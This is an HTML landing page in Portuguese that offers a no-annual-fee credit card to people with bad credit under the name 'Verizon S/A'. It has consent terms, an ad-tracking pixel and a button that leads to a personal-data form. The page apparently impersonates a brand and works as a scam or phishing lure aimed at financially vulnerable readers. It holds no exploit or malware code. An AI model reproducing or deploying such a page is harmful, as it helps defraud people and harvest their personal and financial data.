<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verizon - Faça seu Cartão</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">
    
<script src="js/latest.js" async="" defer=""></script>

<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
    
</head><body>
    <link rel="stylesheet" href="css/style.css">
    
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
         
<div class="header">
        <img style="width: 160px;" src="images/VfoPzxB.png" alt="Imagem Centralizada"> 
    </div>
    
    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;padding: 1rem;" class="main-content">
            <div id="termos" class="mb-3">
                <p style="color: #393939">Conta gratuita, cartão de crédito sem anuidade <strong>para negativados</strong> e muito mais. Tudo isso em um só lugar.</p>
                <div style="background-color: #f5f7f9; padding: 15px; border-radius: 20px; text-align: left;">
                    <ul>
                        <li>Crédito sujeito a análise e aprovação.</li>
                        <li>Os dados fornecidos por você a seguir serão utilizados para o processo de aquisição do cartão de crédito.</li>
                        <li>Autorizo a consulta ao SCR - Sistema de Crédito do Banco Central e aos cadastros e órgãos de proteção ao crédito.</li>
                    </ul>
                </div>
                <button class="btn btn-custom mt-3" onclick="location.href='../personal/index.php'">Li e concordo</button>
            </div>
        </div>
    </div>    
    <div class="footer py-4" id="footerChg">
        © 2024 Verizon S/A. CNPJ 68.694.585/0001-20. <br>
        Av. Brig. Faria Lima, 1811, São Paulo/SP
    </div>

    <script src="js/bootstrap.bundle.min.js"></script>




</div></body></html>